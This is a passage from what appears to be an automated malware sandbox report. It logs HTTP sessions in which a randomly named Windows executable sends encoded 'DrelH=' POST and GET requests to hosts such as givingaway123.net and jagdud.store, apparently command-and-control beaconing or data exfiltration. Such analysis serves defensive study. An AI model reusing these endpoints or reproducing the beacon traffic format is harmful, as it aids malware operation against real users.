                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 66 66 54 6f 6a 4c 64 6e 42 2f 42 54 63 55 71 4c 7a 59 68 41 2f 4b 6c 6a 57 6e 49 6e 7a 32 66 71 6a 74 62 47 41 6d 54 4f 2f 63 32 78 4f 75 72 32 63 76 30 74 63 78 77 4a 32 58 4e 56 41 66 6f 4f 36 53 63 2b 46 57 74 39 4f 6b 74 79 44 30 71 44 36 78 53 7a 38 4e 47 48 78 62 33 70 58 53 66 62 53 46 57 64 39 64 6c 4b 4d 45 75 44 41 6f 78 4e 66 70 64 45 77 57 6e 2b 6a 56 32 75 33 4d 4d 58 33 31 36 39 55 42 76 49 58 6a 43 72 63 39 6d 5a 31 66 52 35 46 52 51 68 4a 79 63 6d 73 37 49 32 47 69 68 48 43 2f 36 36 4a 65 62 6c 72 48 50 48 77 68 33 30 53 75 6f 63 33 78 42 47 4e 4e 47 64 79 41 39 41 7a 72 4d 3d
                                                                                                                                  Data Ascii: DrelH=ffTojLdnB/BTcUqLzYhA/KljWnInz2fqjtbGAmTO/c2xOur2cv0tcxwJ2XNVAfoO6Sc+FWt9OktyD0qD6xSz8NGHxb3pXSfbSFWd9dlKMEuDAoxNfpdEwWn+jV2u3MMX3169UBvIXjCrc9mZ1fR5FRQhJycms7I2GihHC/66JeblrHPHwh30Suoc3xBGNNGdyA9AzrM=
                                                                                                                                  Oct 22, 2024 22:58:17.349528074 CEST877INHTTP/1.1 200 OK
                                                                                                                                  date: Tue, 22 Oct 2024 20:58:17 GMT
                                                                                                                                  server: Apache
                                                                                                                                  set-cookie: __tad=1729630697.6660268; expires=Fri, 20-Oct-2034 20:58:17 GMT; Max-Age=315360000
                                                                                                                                  vary: Accept-Encoding
                                                                                                                                  content-encoding: gzip
                                                                                                                                  content-length: 582
                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                  connection: close
                                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f [TRUNCATED]
                                                                                                                                  Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  26192.168.2.553229103.224.182.242801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:19.249036074 CEST779OUTPOST /1juc/ HTTP/1.1
                                                                                                                                  Host: www.givingaway123.net
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.givingaway123.net
                                                                                                                                  Referer: http://www.givingaway123.net/1juc/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 66 66 54 6f 6a 4c 64 6e 42 2f 42 54 64 30 61 4c 78 2f 56 41 35 71 6c 69 61 48 49 6e 6c 47 66 75 6a 74 66 47 41 6e 48 65 2f 4f 69 78 4f 4f 62 32 64 74 63 74 66 78 77 4a 78 6e 4e 51 65 76 6f 52 36 53 52 44 46 58 52 39 4f 67 39 79 44 31 61 44 36 43 36 30 39 64 47 42 39 37 33 6e 59 79 66 62 53 46 57 64 39 63 42 6b 4d 45 32 44 41 59 68 4e 63 4d 70 48 2b 32 6e 35 7a 46 32 75 7a 4d 4d 62 33 31 36 62 55 41 44 75 58 68 4b 72 63 39 32 5a 79 4f 52 34 65 42 51 6e 57 69 64 4d 74 34 35 59 50 78 42 30 4b 4e 6d 34 49 75 54 46 71 78 69 74 71 44 2f 63 42 4f 45 6b 6e 69 4a 78 63 39 6e 30 6f 6a 74 77 74 38 59 74 68 42 37 63 36 4f 62 50 77 53 34 47 52 5a 42 55 61 41 2f 44
                                                                                                                                  Data Ascii: DrelH=ffTojLdnB/BTd0aLx/VA5qliaHInlGfujtfGAnHe/OixOOb2dtctfxwJxnNQevoR6SRDFXR9Og9yD1aD6C609dGB973nYyfbSFWd9cBkME2DAYhNcMpH+2n5zF2uzMMb316bUADuXhKrc92ZyOR4eBQnWidMt45YPxB0KNm4IuTFqxitqD/cBOEkniJxc9n0ojtwt8YthB7c6ObPwS4GRZBUaA/D
                                                                                                                                  Oct 22, 2024 22:58:19.920167923 CEST877INHTTP/1.1 200 OK
                                                                                                                                  date: Tue, 22 Oct 2024 20:58:19 GMT
                                                                                                                                  server: Apache
                                                                                                                                  set-cookie: __tad=1729630699.8206090; expires=Fri, 20-Oct-2034 20:58:19 GMT; Max-Age=315360000
                                                                                                                                  vary: Accept-Encoding
                                                                                                                                  content-encoding: gzip
                                                                                                                                  content-length: 582
                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                  connection: close
                                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f [TRUNCATED]
                                                                                                                                  Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8
                                                                                                                                  Oct 22, 2024 22:58:20.192421913 CEST877INHTTP/1.1 200 OK
                                                                                                                                  date: Tue, 22 Oct 2024 20:58:19 GMT
                                                                                                                                  server: Apache
                                                                                                                                  set-cookie: __tad=1729630699.8206090; expires=Fri, 20-Oct-2034 20:58:19 GMT; Max-Age=315360000
                                                                                                                                  vary: Accept-Encoding
                                                                                                                                  content-encoding: gzip
                                                                                                                                  content-length: 582
                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                  connection: close
                                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f [TRUNCATED]
                                                                                                                                  Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  27192.168.2.553230103.224.182.242801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:21.947407007 CEST1796OUTPOST /1juc/ HTTP/1.1
                                                                                                                                  Host: www.givingaway123.net
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.givingaway123.net
                                                                                                                                  Referer: http://www.givingaway123.net/1juc/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 66 66 54 6f 6a 4c 64 6e 42 2f 42 54 64 30 61 4c 78 2f 56 41 35 71 6c 69 61 48 49 6e 6c 47 66 75 6a 74 66 47 41 6e 48 65 2f 4f 36 78 4f 66 37 32 64 4c 55 74 65 78 77 4a 79 6e 4e 52 65 76 70 4e 36 52 68 48 46 58 64 58 4f 6d 68 79 43 54 47 44 34 7a 36 30 30 64 47 42 69 4c 33 6d 58 53 65 47 53 46 47 52 39 63 52 6b 4d 45 32 44 41 61 70 4e 4c 4a 64 48 38 32 6e 2b 6a 56 32 71 33 4d 4e 4d 33 31 53 6c 55 41 48 59 51 52 71 72 46 5a 71 5a 33 38 35 34 44 52 51 6c 56 69 64 55 74 34 31 62 50 78 63 4e 4b 4d 44 64 49 73 44 46 6f 32 6a 32 2f 68 37 63 63 4f 6b 66 6f 54 39 71 4c 64 2f 57 6f 69 63 61 68 76 68 4d 6d 46 6e 53 74 59 58 4a 36 41 45 4c 53 73 35 44 49 6e 36 72 6c 66 4e 66 48 65 37 61 6d 48 2f 72 33 66 64 34 43 48 64 43 79 6d 38 76 41 52 5a 42 6e 2f 51 6d 34 52 57 65 6b 36 66 34 6e 53 78 7a 64 6f 4e 48 4e 42 73 66 33 32 62 6b 67 59 6e 4e 53 44 44 31 62 45 51 73 5a 52 36 46 6c 75 4d 6e 6f 76 71 76 77 59 70 4a 59 4d 63 41 6f 51 69 64 43 6f 2b 34 52 52 6d 6a 48 55 34 47 6c 53 2f 71 59 66 51 49 [TRUNCATED]
                                                                                                                                  Data Ascii: DrelH=ffTojLdnB/BTd0aLx/VA5qliaHInlGfujtfGAnHe/O6xOf72dLUtexwJynNRevpN6RhHFXdXOmhyCTGD4z600dGBiL3mXSeGSFGR9cRkME2DAapNLJdH82n+jV2q3MNM31SlUAHYQRqrFZqZ3854DRQlVidUt41bPxcNKMDdIsDFo2j2/h7ccOkfoT9qLd/WoicahvhMmFnStYXJ6AELSs5DIn6rlfNfHe7amH/r3fd4CHdCym8vARZBn/Qm4RWek6f4nSxzdoNHNBsf32bkgYnNSDD1bEQsZR6FluMnovqvwYpJYMcAoQidCo+4RRmjHU4GlS/qYfQIKH1/OwK2Gtuu2Bl8g9bUUxw5oPSS2gJ3EU5NOqQG6c88jtSfvUcyfbgTQd86L/BBdzbFTf43nvsQoXh65hTvZ60qU8FQh9Bk/YmBEVM/l51ZmNxU4hL0mglbCD6l0EHwAAUarpMFpJ6fuGd/RgRMN5A5QLR6X8fGlS5aKtVQAkb+j5G7BIxPqhA6re8pAfoujAkche0oDgUewi4htQw+kyPkMjK/DW6L12V+l+TCAN4MAooFf9svPgeAPg1fraXI4oWjy+ci9tv/gObj3Y13GL4siguiF1TMBCqjPwxCGiDiifhZTPIkmNxQwqfl+6kylQVfI8+iXzkKKsqt7MFJ3lyz0p7ExA4DEa2F86/Q3e9xxTXB+cE5DaOjAKv4nGvwunidnbeQMdGbaeiY4g/H+baQxilAadXihgy1XqFB5eO57Nh+aICHzRz1+hqgiW8hyum9Pu7VOHGSTslWidDCN/BwuCn6Bv3ScsEaqruKHWH14EnszjX4/JptgHyQHzWW7MEfA3OWsYjs2n014pYLXv58XSxNNPG4EgmG5O+inR2I/zK9uT36/I+MjWzRrCeR5GE+/Qv66rLyhNEcWhf9gnvCKb/HEyxRLVq9/YHJ0xnYHn8qq2BLHMYf+va70REIStngaWsqfuuskhXOYsIlQs8i6TqFrw5yAq [TRUNCATED]
                                                                                                                                  Oct 22, 2024 22:58:22.596883059 CEST877INHTTP/1.1 200 OK
                                                                                                                                  date: Tue, 22 Oct 2024 20:58:22 GMT
                                                                                                                                  server: Apache
                                                                                                                                  set-cookie: __tad=1729630702.4699844; expires=Fri, 20-Oct-2034 20:58:22 GMT; Max-Age=315360000
                                                                                                                                  vary: Accept-Encoding
                                                                                                                                  content-encoding: gzip
                                                                                                                                  content-length: 582
                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                  connection: close
                                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f [TRUNCATED]
                                                                                                                                  Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  28192.168.2.553231103.224.182.242801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:24.480096102 CEST486OUTGET /1juc/?DrelH=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D8s2i/Pv/RCSFWjqZ6c9XIS2ZXqJQLcds/lvq2BX8pMITrA==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.givingaway123.net
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 22:58:25.173501015 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  date: Tue, 22 Oct 2024 20:58:25 GMT
                                                                                                                                  server: Apache
                                                                                                                                  set-cookie: __tad=1729630705.7903887; expires=Fri, 20-Oct-2034 20:58:25 GMT; Max-Age=315360000
                                                                                                                                  vary: Accept-Encoding
                                                                                                                                  content-length: 1527
                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                  connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 67 69 76 69 6e 67 61 77 61 79 31 32 33 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 69 76 69 6e 67 61 77 61 79 31 32 33 2e 6e 65 74 2f 31 6a 75 63 2f 3f 44 72 65 6c 48 3d 53 64 37 49 67 38 73 55 66 38 35 47 55 44 4f 65 78 66 5a 49 37 64 34 66 57 42 52 31 70 32 2b 50 68 49 44 77 59 48 58 34 74 2f 48 44 66 74 44 4a 63 61 41 55 53 33 41 72 6b 48 51 54 64 65 55 50 78 6e 52 36 43 48 64 6b 5a 42 64 49 61 79 75 58 30 6b 2b 44 38 73 32 69 2f 50 76 2f 52 43 53 46 57 6a 71 5a 36 63 39 58 49 53 32 5a 58 71 4a 51 4c 63 64 73 2f 6c 76 71 32 42 [TRUNCATED]
                                                                                                                                  Data Ascii: <html><head><title>givingaway123.net</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.givingaway123.net/1juc/?DrelH=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D8s2i/Pv/RCSFWjqZ6c9XIS2ZXqJQLcds/lvq2BX8pMITrA==&Sx=gnM4ZH&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body
                                                                                                                                  Oct 22, 2024 22:58:25.173566103 CEST563INData Raw: 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e
                                                                                                                                  Data Ascii: bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.givingaway123.net/1juc/?DrelH=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D8s2i/Pv/RCSFWjqZ6c9XIS2ZXqJQLcds/lvq2BX8pMITrA=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  29192.168.2.553232209.74.64.187801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:30.253508091 CEST744OUTPOST /qxse/ HTTP/1.1
                                                                                                                                  Host: www.jagdud.store
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.jagdud.store
                                                                                                                                  Referer: http://www.jagdud.store/qxse/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6d 72 46 4d 39 52 6d 53 55 78 2b 32 6e 4d 6f 50 53 42 4e 6e 4a 49 50 37 59 51 69 31 41 4a 38 55 34 4c 71 71 79 43 32 75 63 4e 66 59 53 6c 73 63 44 4a 64 73 72 73 63 61 4d 44 6b 6b 33 4c 46 42 69 39 66 7a 56 35 37 4e 73 53 2b 66 48 39 43 68 53 6c 74 54 65 76 47 45 6a 4d 57 76 4c 74 4f 39 38 57 64 57 68 69 66 33 75 77 78 48 75 47 6d 63 6e 51 52 7a 4b 4a 6a 6f 77 7a 53 43 30 69 76 31 30 79 36 56 71 4c 76 79 68 66 56 50 75 69 57 47 69 72 32 64 53 76 2f 31 35 4b 67 33 67 78 47 43 51 6e 31 56 56 6e 65 6b 61 71 73 76 73 72 73 44 32 4a 6e 47 6d 63 77 58 75 62 7a 69 65 47 63 4c 73 7a 6b 39 72 32 73 3d
                                                                                                                                  Data Ascii: DrelH=mrFM9RmSUx+2nMoPSBNnJIP7YQi1AJ8U4LqqyC2ucNfYSlscDJdsrscaMDkk3LFBi9fzV57NsS+fH9ChSltTevGEjMWvLtO98WdWhif3uwxHuGmcnQRzKJjowzSC0iv10y6VqLvyhfVPuiWGir2dSv/15Kg3gxGCQn1VVnekaqsvsrsD2JnGmcwXubzieGcLszk9r2s=
                                                                                                                                  Oct 22, 2024 22:58:30.917712927 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Tue, 22 Oct 2024 20:58:30 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Content-Length: 389
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  30192.168.2.553233209.74.64.187801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:32.799354076 CEST764OUTPOST /qxse/ HTTP/1.1
